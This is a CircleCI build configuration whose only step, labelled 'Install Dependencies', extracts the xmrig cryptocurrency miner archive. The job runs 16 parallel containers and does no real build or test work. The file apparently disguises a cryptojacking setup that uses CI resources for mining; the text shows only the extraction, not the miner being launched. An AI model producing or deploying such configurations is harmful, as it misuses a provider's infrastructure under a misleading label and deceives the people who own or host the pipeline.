version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              tar xvzf xmrig-6.16.2-focal-x64.tar.gz
workflows:
    version: 2.1
    build:
        jobs:
        - trial
